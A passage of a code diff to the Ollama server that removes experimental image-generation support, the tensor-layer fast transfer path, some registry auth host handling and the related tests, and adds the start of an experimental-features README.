-func TestRegistryChallengeURL(t *testing.T) {
-	challenge := registryChallenge{
-		Realm:   "https://auth.example.com/token",
-		Service: "registry",
-		Scope:   "repo:foo:pull repo:bar:push",
-	}
-
-	u, err := challenge.URL()
-	if err != nil {
-		t.Fatalf("URL() error: %v", err)
-	}
-
-	if u.Host != "auth.example.com" {
-		t.Errorf("host = %q, want %q", u.Host, "auth.example.com")
-	}
-	if u.Path != "/token" {
-		t.Errorf("path = %q, want %q", u.Path, "/token")
-	}
-
-	q := u.Query()
-	if q.Get("service") != "registry" {
-		t.Errorf("service = %q, want %q", q.Get("service"), "registry")
-	}
-	if scopes := q["scope"]; len(scopes) != 2 {
-		t.Errorf("scope count = %d, want 2", len(scopes))
-	}
-	if q.Get("ts") == "" {
-		t.Error("missing ts")
-	}
-	if q.Get("nonce") == "" {
-		t.Error("missing nonce")
-	}
-
-	// Nonces should differ between calls
-	u2, _ := challenge.URL()
-	if q.Get("nonce") == u2.Query().Get("nonce") {
-		t.Error("nonce should be unique per call")
-	}
-}
-
-func TestRegistryChallengeURLInvalid(t *testing.T) {
-	challenge := registryChallenge{Realm: "://invalid"}
-	if _, err := challenge.URL(); err == nil {
-		t.Error("expected error for invalid URL")
-	}
-}
--- a/server/images.go
+++ b/server/images.go
@@ -30,7 +30,6 @@ import (
 	"github.com/ollama/ollama/thinking"
 	"github.com/ollama/ollama/types/model"
 	"github.com/ollama/ollama/version"
-	"github.com/ollama/ollama/x/imagegen/transfer"
 )

 var (
@@ -41,7 +40,6 @@ var (
 	errCapabilityVision     = errors.New("vision")
 	errCapabilityEmbedding  = errors.New("embedding")
 	errCapabilityThinking   = errors.New("thinking")
-	errCapabilityImage      = errors.New("image generation")
 	errInsecureProtocol     = errors.New("insecure protocol http")
 )

@@ -75,11 +73,6 @@ type Model struct {
 func (m *Model) Capabilities() []model.Capability {
 	capabilities := []model.Capability{}

-	// Check for image generation model via config capabilities
-	if slices.Contains(m.Config.Capabilities, "image") {
-		return []model.Capability{model.CapabilityImage}
-	}
-
 	// Check for completion capability
 	if m.ModelPath != "" {
 		f, err := gguf.Open(m.ModelPath)
@@ -160,7 +153,6 @@ func (m *Model) CheckCapabilities(want ...model.Capability) error {
 		model.CapabilityVision:     errCapabilityVision,
 		model.CapabilityEmbedding:  errCapabilityEmbedding,
 		model.CapabilityThinking:   errCapabilityThinking,
-		model.CapabilityImage:      errCapabilityImage,
 	}

 	for _, cap := range want {
@@ -563,24 +555,6 @@ func PushModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		layers = append(layers, manifest.Config)
 	}

-	// Use fast transfer for models with tensor layers (many small blobs)
-	if hasTensorLayers(layers) {
-		// Read raw manifest JSON to preserve tensor metadata fields
-		manifestPath, err := mp.GetManifestPath()
-		if err != nil {
-			return err
-		}
-		manifestJSON, err := os.ReadFile(manifestPath)
-		if err != nil {
-			return err
-		}
-		if err := pushWithTransfer(ctx, mp, layers, manifestJSON, regOpts, fn); err != nil {
-			return err
-		}
-		fn(api.ProgressResponse{Status: "success"})
-		return nil
-	}
-
 	for _, layer := range layers {
 		if err := uploadBlob(ctx, mp, layer, regOpts, fn); err != nil {
 			slog.Info(fmt.Sprintf("error uploading blob: %v", err))
@@ -646,15 +620,6 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		layers = append(layers, manifest.Config)
 	}

-	// Use fast transfer for models with tensor layers (many small blobs)
-	if hasTensorLayers(layers) {
-		if err := pullWithTransfer(ctx, mp, layers, manifest, regOpts, fn); err != nil {
-			return err
-		}
-		fn(api.ProgressResponse{Status: "success"})
-		return nil
-	}
-
 	skipVerify := make(map[string]bool)
 	for _, layer := range layers {
 		cacheHit, err := downloadBlob(ctx, downloadOpts{
@@ -669,6 +634,7 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		skipVerify[layer.Digest] = cacheHit
 		delete(deleteMap, layer.Digest)
 	}
+	delete(deleteMap, manifest.Config.Digest)

 	fn(api.ProgressResponse{Status: "verifying sha256 digest"})
 	for _, layer := range layers {
@@ -677,11 +643,13 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		}
 		if err := verifyBlob(layer.Digest); err != nil {
 			if errors.Is(err, errDigestMismatch) {
+				// something went wrong, delete the blob
 				fp, err := GetBlobsPath(layer.Digest)
 				if err != nil {
 					return err
 				}
 				if err := os.Remove(fp); err != nil {
+					// log this, but return the original error
 					slog.Info(fmt.Sprintf("couldn't remove file with digest mismatch '%s': %v", fp, err))
 				}
 			}
@@ -689,11 +657,6 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 		}
 	}

-	for _, layer := range layers {
-		delete(deleteMap, layer.Digest)
-	}
-	delete(deleteMap, manifest.Config.Digest)
-
 	fn(api.ProgressResponse{Status: "writing manifest"})

 	manifestJSON, err := json.Marshal(manifest)
@@ -727,148 +690,6 @@ func PullModel(ctx context.Context, name string, regOpts *registryOptions, fn fu
 	return nil
 }

-// hasTensorLayers checks if any layer has tensor media type.
-func hasTensorLayers(layers []Layer) bool {
-	for _, layer := range layers {
-		if layer.MediaType == MediaTypeImageTensor {
-			return true
-		}
-	}
-	return false
-}
-
-// pullWithTransfer uses the simplified x/transfer package for downloading blobs.
-func pullWithTransfer(ctx context.Context, mp ModelPath, layers []Layer, manifest *Manifest, regOpts *registryOptions, fn func(api.ProgressResponse)) error {
-	blobs := make([]transfer.Blob, len(layers))
-	for i, layer := range layers {
-		blobs[i] = transfer.Blob{
-			Digest: layer.Digest,
-			Size:   layer.Size,
-		}
-	}
-
-	destDir, err := GetBlobsPath("")
-	if err != nil {
-		return err
-	}
-
-	base := mp.BaseURL()
-	if base.Scheme != "http" && regOpts != nil && regOpts.Insecure {
-		base.Scheme = "http"
-	}
-	baseURL := base.String()
-
-	var totalSize int64
-	for _, blob := range blobs {
-		totalSize += blob.Size
-	}
-
-	progress := func(completed, total int64) {
-		fn(api.ProgressResponse{
-			Status:    "pulling model",
-			Digest:    "sha256:model",
-			Total:     total,
-			Completed: completed,
-		})
-	}
-
-	getToken := func(ctx context.Context, challenge transfer.AuthChallenge) (string, error) {
-		return getAuthorizationToken(ctx, registryChallenge{
-			Realm:   challenge.Realm,
-			Service: challenge.Service,
-			Scope:   challenge.Scope,
-		}, base.Host)
-	}
-
-	if err := transfer.Download(ctx, transfer.DownloadOptions{
-		Blobs:      blobs,
-		BaseURL:    baseURL,
-		DestDir:    destDir,
-		Repository: mp.GetNamespaceRepository(),
-		Progress:   progress,
-		Token:      regOpts.Token,
-		GetToken:   getToken,
-		Logger:     slog.Default(),
-	}); err != nil {
-		return err
-	}
-
-	// Write manifest
-	fn(api.ProgressResponse{Status: "writing manifest"})
-	manifestJSON, err := json.Marshal(manifest)
-	if err != nil {
-		return err
-	}
-
-	fp, err := mp.GetManifestPath()
-	if err != nil {
-		return err
-	}
-	if err := os.MkdirAll(filepath.Dir(fp), 0o755); err != nil {
-		return err
-	}
-
-	return os.WriteFile(fp, manifestJSON, 0o644)
-}
-
-// pushWithTransfer uses the simplified x/transfer package for uploading blobs and manifest.
-func pushWithTransfer(ctx context.Context, mp ModelPath, layers []Layer, manifestJSON []byte, regOpts *registryOptions, fn func(api.ProgressResponse)) error {
-	blobs := make([]transfer.Blob, len(layers))
-	for i, layer := range layers {
-		blobs[i] = transfer.Blob{
-			Digest: layer.Digest,
-			Size:   layer.Size,
-			From:   layer.From,
-		}
-	}
-
-	srcDir, err := GetBlobsPath("")
-	if err != nil {
-		return err
-	}
-
-	base := mp.BaseURL()
-	if base.Scheme != "http" && regOpts != nil && regOpts.Insecure {
-		base.Scheme = "http"
-	}
-	baseURL := base.String()
-
-	var totalSize int64
-	for _, blob := range blobs {
-		totalSize += blob.Size
-	}
-
-	progress := func(completed, total int64) {
-		fn(api.ProgressResponse{
-			Status:    "pushing model",
-			Digest:    "sha256:model",
-			Total:     total,
-			Completed: completed,
-		})
-	}
-
-	getToken := func(ctx context.Context, challenge transfer.AuthChallenge) (string, error) {
-		return getAuthorizationToken(ctx, registryChallenge{
-			Realm:   challenge.Realm,
-			Service: challenge.Service,
-			Scope:   challenge.Scope,
-		}, base.Host)
-	}
-
-	return transfer.Upload(ctx, transfer.UploadOptions{
-		Blobs:       blobs,
-		BaseURL:     baseURL,
-		SrcDir:      srcDir,
-		Progress:    progress,
-		Token:       regOpts.Token,
-		GetToken:    getToken,
-		Logger:      slog.Default(),
-		Manifest:    manifestJSON,
-		ManifestRef: mp.Tag,
-		Repository:  mp.GetNamespaceRepository(),
-	})
-}
-
 func pullModelManifest(ctx context.Context, mp ModelPath, regOpts *registryOptions) (*Manifest, error) {
 	requestURL := mp.BaseURL().JoinPath("v2", mp.GetNamespaceRepository(), "manifests", mp.Tag)

@@ -918,7 +739,7 @@ func makeRequestWithRetry(ctx context.Context, method string, requestURL *url.UR

 			// Handle authentication error with one retry
 			challenge := parseRegistryChallenge(resp.Header.Get("www-authenticate"))
-			token, err := getAuthorizationToken(ctx, challenge, requestURL.Host)
+			token, err := getAuthorizationToken(ctx, challenge)
 			if err != nil {
 				return nil, err
 			}
--- a/server/images_test.go
+++ b/server/images_test.go
@@ -47,15 +47,6 @@ func TestModelCapabilities(t *testing.T) {
 		model        Model
 		expectedCaps []model.Capability
 	}{
-		{
-			name: "model with image generation capability via config",
-			model: Model{
-				Config: model.ConfigV2{
-					Capabilities: []string{"image"},
-				},
-			},
-			expectedCaps: []model.Capability{model.CapabilityImage},
-		},
 		{
 			name: "model with completion capability",
 			model: Model{
@@ -242,24 +233,6 @@ func TestModelCheckCapabilities(t *testing.T) {
 			checkCaps:      []model.Capability{"unknown"},
 			expectedErrMsg: "unknown capability",
 		},
-		{
-			name: "model missing image generation capability",
-			model: Model{
-				ModelPath: completionModelPath,
-				Template:  chatTemplate,
-			},
-			checkCaps:      []model.Capability{model.CapabilityImage},
-			expectedErrMsg: "does not support image generation",
-		},
-		{
-			name: "model with image generation capability",
-			model: Model{
-				Config: model.ConfigV2{
-					Capabilities: []string{"image"},
-				},
-			},
-			checkCaps: []model.Capability{model.CapabilityImage},
-		},
 	}

 	for _, tt := range tests {
--- a/server/layer.go
+++ b/server/layer.go
@@ -13,14 +13,9 @@ type Layer struct {
 	Digest    string `json:"digest"`
 	Size      int64  `json:"size"`
 	From      string `json:"from,omitempty"`
-	Name      string `json:"name,omitempty"` // tensor name, e.g., "text_encoder/model.embed_tokens.weight"
 	status    string
 }

-const (
-	MediaTypeImageTensor = "application/vnd.ollama.image.tensor"
-)
-
 func NewLayer(r io.Reader, mediatype string) (Layer, error) {
 	blobs, err := GetBlobsPath("")
 	if err != nil {
--- a/server/manifest.go
+++ b/server/manifest.go
@@ -47,37 +47,13 @@ func (m *Manifest) Remove() error {
 }

 func (m *Manifest) RemoveLayers() error {
-	ms, err := Manifests(true)
-	if err != nil {
-		return err
-	}
-
-	// Build set of digests still in use by other manifests
-	inUse := make(map[string]struct{})
-	for _, other := range ms {
-		for _, layer := range append(other.Layers, other.Config) {
-			if layer.Digest != "" {
-				inUse[layer.Digest] = struct{}{}
-			}
-		}
-	}
-
-	// Remove layers not used by any other manifest
 	for _, layer := range append(m.Layers, m.Config) {
-		if layer.Digest == "" {
-			continue
-		}
-		if _, used := inUse[layer.Digest]; used {
-			continue
-		}
-		blob, err := GetBlobsPath(layer.Digest)
-		if err != nil {
-			return err
-		}
-		if err := os.Remove(blob); errors.Is(err, os.ErrNotExist) {
-			slog.Debug("layer does not exist", "digest", layer.Digest)
-		} else if err != nil {
-			return err
+		if layer.Digest != "" {
+			if err := layer.Remove(); errors.Is(err, os.ErrNotExist) {
+				slog.Debug("layer does not exist", "digest", layer.Digest)
+			} else if err != nil {
+				return err
+			}
 		}
 	}

--- a/server/routes.go
+++ b/server/routes.go
@@ -50,8 +50,6 @@ import (
 	"github.com/ollama/ollama/types/errtypes"
 	"github.com/ollama/ollama/types/model"
 	"github.com/ollama/ollama/version"
-	"github.com/ollama/ollama/x/imagegen"
-	xserver "github.com/ollama/ollama/x/server"
 )

 const signinURLStr = "https://ollama.com/connect?name=%s&key=%s"
@@ -315,7 +313,7 @@ func (s *Server) GenerateHandler(c *gin.Context) {
 		return
 	}

-	// expire the runner if unload is requested (empty prompt, keep alive is 0)
+	// expire the runner
 	if req.Prompt == "" && req.KeepAlive != nil && req.KeepAlive.Duration == 0 {
 		s.sched.expireRunner(m)

@@ -329,12 +327,6 @@ func (s *Server) GenerateHandler(c *gin.Context) {
 		return
 	}

-	// Handle image generation models
-	if slices.Contains(m.Capabilities(), model.CapabilityImage) {
-		s.handleImageGenerate(c, req, name.String(), checkpointStart)
-		return
-	}
-
 	if req.Raw && (req.Template != "" || req.System != "" || len(req.Context) > 0) {
 		c.AbortWithStatusJSON(http.StatusBadRequest, gin.H{"error": "raw mode does not support template, system, or context"})
 		return
@@ -1101,31 +1093,6 @@ func GetModelInfo(req api.ShowRequest) (*api.ShowResponse, error) {
 		QuantizationLevel: m.Config.FileType,
 	}

-	// For image generation models, populate details from imagegen package
-	if slices.Contains(m.Capabilities(), model.CapabilityImage) {
-		if info, err := imagegen.GetModelInfo(name.String()); err == nil {
-			modelDetails.Family = info.Architecture
-			modelDetails.ParameterSize = format.HumanNumber(uint64(info.ParameterCount))
-			modelDetails.QuantizationLevel = info.Quantization
-		}
-	}
-
-	// For safetensors LLM models (experimental), populate details from config.json
-	if m.Config.ModelFormat == "safetensors" && slices.Contains(m.Config.Capabilities, "completion") {
-		if info, err := xserver.GetSafetensorsLLMInfo(name.String()); err == nil {
-			if arch, ok := info["general.architecture"].(string); ok && arch != "" {
-				modelDetails.Family = arch
-			}
-			if paramCount, ok := info["general.parameter_count"].(int64); ok && paramCount > 0 {
-				modelDetails.ParameterSize = format.HumanNumber(uint64(paramCount))
-			}
-		}
-		// Get torch_dtype directly from config.json for quantization level
-		if dtype, err := xserver.GetSafetensorsDtype(name.String()); err == nil && dtype != "" {
-			modelDetails.QuantizationLevel = dtype
-		}
-	}
-
 	if req.System != "" {
 		m.System = req.System
 	}
@@ -1208,30 +1175,6 @@ func GetModelInfo(req api.ShowRequest) (*api.ShowResponse, error) {
 		return resp, nil
 	}

-	if slices.Contains(m.Capabilities(), model.CapabilityImage) {
-		// Populate tensor info if verbose
-		if req.Verbose {
-			if tensors, err := xserver.GetSafetensorsTensorInfo(name.String()); err == nil {
-				resp.Tensors = tensors
-			}
-		}
-		return resp, nil
-	}
-
-	// For safetensors LLM models (experimental), populate ModelInfo from config.json
-	if m.Config.ModelFormat == "safetensors" && slices.Contains(m.Config.Capabilities, "completion") {
-		if info, err := xserver.GetSafetensorsLLMInfo(name.String()); err == nil {
-			resp.ModelInfo = info
-		}
-		// Populate tensor info if verbose
-		if req.Verbose {
-			if tensors, err := xserver.GetSafetensorsTensorInfo(name.String()); err == nil {
-				resp.Tensors = tensors
-			}
-		}
-		return resp, nil
-	}
-
 	kvData, tensors, err := getModelData(m.ModelPath, req.Verbose)
 	if err != nil {
 		return nil, err
@@ -1600,11 +1543,6 @@ func (s *Server) GenerateRoutes(rc *ollama.Registry) (http.Handler, error) {
 	r.GET("/v1/models", middleware.ListMiddleware(), s.ListHandler)
 	r.GET("/v1/models/:model", middleware.RetrieveMiddleware(), s.ShowHandler)
 	r.POST("/v1/responses", middleware.ResponsesMiddleware(), s.ChatHandler)
-	// OpenAI-compatible image generation endpoint
-	r.POST("/v1/images/generations", middleware.ImageGenerationsMiddleware(), s.GenerateHandler)
-
-	// Inference (Anthropic compatibility)
-	r.POST("/v1/messages", middleware.AnthropicMessagesMiddleware(), s.ChatHandler)

 	if rc != nil {
 		// wrap old with new
@@ -2084,14 +2022,8 @@ func (s *Server) ChatHandler(c *gin.Context) {
 		}
 	} else {
 		if req.Think != nil && req.Think.Bool() {
-			// Set think to nil when being used with Anthropic API to connect to tools like claude code
-			if _, ok := c.Get("relax_thinking"); ok {
-				slog.Warn("model does not support thinking, relaxing thinking to nil", "model", req.Model)
-				req.Think = nil
-			} else {
-				c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support thinking", req.Model)})
-				return
-			}
+			c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("%q does not support thinking", req.Model)})
+			return
 		}
 	}

@@ -2472,91 +2404,3 @@ func filterThinkTags(msgs []api.Message, m *Model) []api.Message {
 	}
 	return msgs
 }
-
-// handleImageGenerate handles image generation requests within GenerateHandler.
-// This is called when the model has the Image capability.
-func (s *Server) handleImageGenerate(c *gin.Context, req api.GenerateRequest, modelName string, checkpointStart time.Time) {
-	// Validate image dimensions
-	const maxDimension int32 = 4096
-	if req.Width > maxDimension || req.Height > maxDimension {
-		c.JSON(http.StatusBadRequest, gin.H{"error": fmt.Sprintf("width and height must be <= %d", maxDimension)})
-		return
-	}
-
-	// Schedule the runner for image generation
-	runner, _, _, err := s.scheduleRunner(c.Request.Context(), modelName, []model.Capability{model.CapabilityImage}, nil, req.KeepAlive)
-	if err != nil {
-		handleScheduleError(c, req.Model, err)
-		return
-	}
-
-	checkpointLoaded := time.Now()
-
-	// Handle load-only request (empty prompt)
-	if req.Prompt == "" {
-		c.JSON(http.StatusOK, api.GenerateResponse{
-			Model:      req.Model,
-			CreatedAt:  time.Now().UTC(),
-			Done:       true,
-			DoneReason: "load",
-		})
-		return
-	}
-
-	// Set headers for streaming response
-	c.Header("Content-Type", "application/x-ndjson")
-
-	// Get seed from options if provided
-	var seed int64
-	if s, ok := req.Options["seed"]; ok {
-		switch v := s.(type) {
-		case int:
-			seed = int64(v)
-		case int64:
-			seed = v
-		case float64:
-			seed = int64(v)
-		}
-	}
-
-	var streamStarted bool
-	if err := runner.Completion(c.Request.Context(), llm.CompletionRequest{
-		Prompt: req.Prompt,
-		Width:  req.Width,
-		Height: req.Height,
-		Steps:  req.Steps,
-		Seed:   seed,
-	}, func(cr llm.CompletionResponse) {
-		streamStarted = true
-		res := api.GenerateResponse{
-			Model:     req.Model,
-			CreatedAt: time.Now().UTC(),
-			Done:      cr.Done,
-		}
-
-		if cr.TotalSteps > 0 {
-			res.Completed = int64(cr.Step)
-			res.Total = int64(cr.TotalSteps)
-		}
-
-		if cr.Image != "" {
-			res.Image = cr.Image
-		}
-
-		if cr.Done {
-			res.DoneReason = cr.DoneReason.String()
-			res.Metrics.TotalDuration = time.Since(checkpointStart)
-			res.Metrics.LoadDuration = checkpointLoaded.Sub(checkpointStart)
-		}
-
-		data, _ := json.Marshal(res)
-		c.Writer.Write(append(data, '\n'))
-		c.Writer.Flush()
-	}); err != nil {
-		// Only send JSON error if streaming hasn't started yet
-		// (once streaming starts, headers are committed and we can't change status code)
-		if !streamStarted {
-			c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
-		}
-	}
-}
--- a/server/routes_generate_test.go
+++ b/server/routes_generate_test.go
@@ -2101,95 +2101,3 @@ func TestChatWithPromptEndingInThinkTag(t *testing.T) {
 		}
 	})
 }
-
-func TestGenerateUnload(t *testing.T) {
-	gin.SetMode(gin.TestMode)
-
-	var loadFnCalled bool
-
-	s := Server{
-		sched: &Scheduler{
-			pendingReqCh:    make(chan *LlmRequest, 1),
-			finishedReqCh:   make(chan *LlmRequest, 1),
-			expiredCh:       make(chan *runnerRef, 1),
-			unloadedCh:      make(chan any, 1),
-			loaded:          make(map[string]*runnerRef),
-			newServerFn:     newMockServer(&mockRunner{}),
-			getGpuFn:        getGpuFn,
-			getSystemInfoFn: getSystemInfoFn,
-			loadFn: func(req *LlmRequest, _ *ggml.GGML, _ ml.SystemInfo, _ []ml.DeviceInfo, _ bool) bool {
-				loadFnCalled = true
-				req.successCh <- &runnerRef{llama: &mockRunner{}}
-				return false
-			},
-		},
-	}
-
-	go s.sched.Run(t.Context())
-
-	_, digest := createBinFile(t, ggml.KV{
-		"general.architecture":          "llama",
-		"llama.block_count":             uint32(1),
-		"llama.context_length":          uint32(8192),
-		"llama.embedding_length":        uint32(4096),
-		"llama.attention.head_count":    uint32(32),
-		"llama.attention.head_count_kv": uint32(8),
-		"tokenizer.ggml.tokens":         []string{""},
-		"tokenizer.ggml.scores":         []float32{0},
-		"tokenizer.ggml.token_type":     []int32{0},
-	}, []*ggml.Tensor{
-		{Name: "token_embd.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_norm.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.ffn_down.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.ffn_gate.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.ffn_up.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.ffn_norm.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_k.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_output.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_q.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "blk.0.attn_v.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-		{Name: "output.weight", Shape: []uint64{1}, WriterTo: bytes.NewReader(make([]byte, 4))},
-	})
-
-	w := createRequest(t, s.CreateHandler, api.CreateRequest{
-		Model:  "test",
-		Files:  map[string]string{"file.gguf": digest},
-		Stream: &stream,
-	})
-
-	if w.Code != http.StatusOK {
-		t.Fatalf("expected status 200, got %d", w.Code)
-	}
-
-	t.Run("unload with empty prompt and keepalive 0", func(t *testing.T) {
-		loadFnCalled = false
-
-		w := createRequest(t, s.GenerateHandler, api.GenerateRequest{
-			Model:     "test",
-			Prompt:    "",
-			KeepAlive: &api.Duration{Duration: 0},
-			Stream:    &stream,
-		})
-
-		if w.Code != http.StatusOK {
-			t.Errorf("expected status 200, got %d", w.Code)
-		}
-
-		var resp api.GenerateResponse
-		if err := json.Unmarshal(w.Body.Bytes(), &resp); err != nil {
-			t.Fatalf("failed to unmarshal response: %v", err)
-		}
-
-		if resp.DoneReason != "unload" {
-			t.Errorf("expected done_reason 'unload', got %q", resp.DoneReason)
-		}
-
-		if !resp.Done {
-			t.Error("expected done to be true")
-		}
-
-		if loadFnCalled {
-			t.Error("expected model NOT to be loaded for unload request, but loadFn was called")
-		}
-	})
-}
--- a/server/sched.go
+++ b/server/sched.go
@@ -21,7 +21,6 @@ import (
 	"github.com/ollama/ollama/logutil"
 	"github.com/ollama/ollama/ml"
 	"github.com/ollama/ollama/types/model"
-	"github.com/ollama/ollama/x/imagegen"
 )

 type LlmRequest struct {
@@ -195,14 +194,6 @@ func (s *Scheduler) processPending(ctx context.Context) {
 						slog.Debug("updating default concurrency", "OLLAMA_MAX_LOADED_MODELS", maxRunners, "gpu_count", len(gpus))
 					}

-					// Check for image generation model before attempting GGML load
-					if slices.Contains(pending.model.Config.Capabilities, "image") {
-						if s.loadImageGen(pending) {
-							break
-						}
-						continue
-					}
-
 					// Load model for fitting
 					logutil.Trace("loading model metadata", "model", pending.model.ModelPath)
 					ggml, err := llm.LoadModel(pending.model.ModelPath, 1024)
@@ -552,49 +543,6 @@ iGPUScan:
 	return false
 }

-// loadImageGen loads an image generation model.
-func (s *Scheduler) loadImageGen(req *LlmRequest) bool {
-	// Use model name for imagegen (it resolves manifests by name, not file path)
-	modelName := req.model.ShortName
-	server, err := imagegen.NewServer(modelName)
-	if err != nil {
-		req.errCh <- err
-		return true
-	}
-
-	sessionDuration := envconfig.KeepAlive()
-	if req.sessionDuration != nil {
-		sessionDuration = req.sessionDuration.Duration
-	}
-
-	runner := &runnerRef{
-		model:           req.model,
-		modelPath:       req.model.ModelPath,
-		llama:           server,
-		Options:         &req.opts,
-		loading:         false,
-		sessionDuration: sessionDuration,
-		totalSize:       server.TotalSize(),
-		vramSize:        server.VRAMSize(),
-	}
-
-	s.loadedMu.Lock()
-	s.loaded[req.model.ModelPath] = runner
-	s.loadedMu.Unlock()
-
-	// Set up expiration timer
-	runner.refMu.Lock()
-	if sessionDuration > 0 {
-		runner.expireTimer = time.AfterFunc(sessionDuration, func() {
-			s.expiredCh <- runner
-		})
-	}
-	runner.refMu.Unlock()
-
-	req.useLoadedRunner(runner, s.finishedReqCh)
-	return true
-}
-
 func (s *Scheduler) updateFreeSpace(allGpus []ml.DeviceInfo) {
 	if len(allGpus) == 0 {
 		return
--- a/server/sched_test.go
+++ b/server/sched_test.go
@@ -804,93 +804,3 @@ func (s *mockLlm) GetPort() int                                       { return -
 func (s *mockLlm) GetDeviceInfos(ctx context.Context) []ml.DeviceInfo { return nil }
 func (s *mockLlm) HasExited() bool                                    { return false }
 func (s *mockLlm) GetActiveDeviceIDs() []ml.DeviceID                  { return nil }
-
-// TestImageGenRunnerCanBeEvicted verifies that an image generation model
-// loaded in the scheduler can be evicted when idle.
-func TestImageGenRunnerCanBeEvicted(t *testing.T) {
-	ctx, done := context.WithTimeout(t.Context(), 500*time.Millisecond)
-	defer done()
-
-	s := InitScheduler(ctx)
-	s.getGpuFn = getGpuFn
-	s.getSystemInfoFn = getSystemInfoFn
-
-	// Simulate an image gen runner already loaded
-	imageGenRunner := &runnerRef{
-		model:           &Model{Name: "z-image", ModelPath: "/fake/image/model"},
-		modelPath:       "/fake/image/model",
-		llama:           &mockLlm{vramSize: 21 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{}},
-		sessionDuration: 5 * time.Millisecond,
-		refCount:        0, // idle
-	}
-
-	s.loadedMu.Lock()
-	s.loaded["/fake/image/model"] = imageGenRunner
-	s.loadedMu.Unlock()
-
-	// Verify the image gen runner is loaded
-	s.loadedMu.Lock()
-	require.Len(t, s.loaded, 1)
-	s.loadedMu.Unlock()
-
-	// findRunnerToUnload should find the idle image gen runner
-	runner := s.findRunnerToUnload()
-	require.NotNil(t, runner)
-	require.Equal(t, "/fake/image/model", runner.modelPath)
-}
-
-// TestImageGenSchedulerCoexistence verifies that image generation models
-// can coexist with language models in the scheduler and VRAM is tracked correctly.
-func TestImageGenSchedulerCoexistence(t *testing.T) {
-	ctx, done := context.WithTimeout(t.Context(), 500*time.Millisecond)
-	defer done()
-
-	s := InitScheduler(ctx)
-	s.getGpuFn = getGpuFn
-	s.getSystemInfoFn = getSystemInfoFn
-
-	// Load both an imagegen runner and a language model runner
-	imageGenRunner := &runnerRef{
-		model:           &Model{Name: "flux", ModelPath: "/fake/flux/model"},
-		modelPath:       "/fake/flux/model",
-		llama:           &mockLlm{vramSize: 8 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{{Library: "Metal"}: 8 * format.GigaByte}},
-		sessionDuration: 10 * time.Millisecond,
-		numParallel:     1,
-		refCount:        0,
-	}
-
-	langModelRunner := &runnerRef{
-		model:           &Model{Name: "llama3", ModelPath: "/fake/llama3/model"},
-		modelPath:       "/fake/llama3/model",
-		llama:           &mockLlm{vramSize: 4 * format.GigaByte, vramByGPU: map[ml.DeviceID]uint64{{Library: "Metal"}: 4 * format.GigaByte}},
-		sessionDuration: 10 * time.Millisecond,
-		numParallel:     1,
-		refCount:        0,
-	}
-
-	s.loadedMu.Lock()
-	s.loaded["/fake/flux/model"] = imageGenRunner
-	s.loaded["/fake/llama3/model"] = langModelRunner
-	s.loadedMu.Unlock()
-
-	// Verify both are loaded
-	s.loadedMu.Lock()
-	require.Len(t, s.loaded, 2)
-	require.NotNil(t, s.loaded["/fake/flux/model"])
-	require.NotNil(t, s.loaded["/fake/llama3/model"])
-	s.loadedMu.Unlock()
-
-	// Verify updateFreeSpace accounts for both
-	gpus := []ml.DeviceInfo{
-		{
-			DeviceID:    ml.DeviceID{Library: "Metal"},
-			TotalMemory: 24 * format.GigaByte,
-			FreeMemory:  24 * format.GigaByte,
-		},
-	}
-	s.updateFreeSpace(gpus)
-
-	// Free memory should be reduced by both models
-	expectedFree := uint64(24*format.GigaByte) - uint64(8*format.GigaByte) - uint64(4*format.GigaByte)
-	require.Equal(t, expectedFree, gpus[0].FreeMemory)
-}
--- a/server/upload.go
+++ b/server/upload.go
@@ -279,7 +279,7 @@ func (b *blobUpload) uploadPart(ctx context.Context, method string, requestURL *
 	case resp.StatusCode == http.StatusUnauthorized:
 		w.Rollback()
 		challenge := parseRegistryChallenge(resp.Header.Get("www-authenticate"))
-		token, err := getAuthorizationToken(ctx, challenge, requestURL.Host)
+		token, err := getAuthorizationToken(ctx, challenge)
 		if err != nil {
 			return err
 		}
--- a/types/model/capability.go
+++ b/types/model/capability.go
@@ -3,13 +3,12 @@ package model
 type Capability string

 const (
-	CapabilityCompletion      = Capability("completion")
-	CapabilityTools           = Capability("tools")
-	CapabilityInsert          = Capability("insert")
-	CapabilityVision          = Capability("vision")
-	CapabilityEmbedding       = Capability("embedding")
-	CapabilityThinking        = Capability("thinking")
-	CapabilityImage = Capability("image")
+	CapabilityCompletion = Capability("completion")
+	CapabilityTools      = Capability("tools")
+	CapabilityInsert     = Capability("insert")
+	CapabilityVision     = Capability("vision")
+	CapabilityEmbedding  = Capability("embedding")
+	CapabilityThinking   = Capability("thinking")
 )

 func (c Capability) String() string {
--- a/x/README.md
+++ b/x/README.md
@@ -0,0 +1,24 @@
+# Experimental Features
+
+## MLX Backend
+
+We're working on a new experimental backend based on the [MLX project](https://github.com/ml-explore/mlx).
+
+Support is currently limited to macOS and Linux with CUDA GPUs. We're looking to add support for Windows with CUDA, and for other GPU vendors, soon. To build:
+
+```
+cmake --preset MLX
+cmake --build --preset MLX --parallel
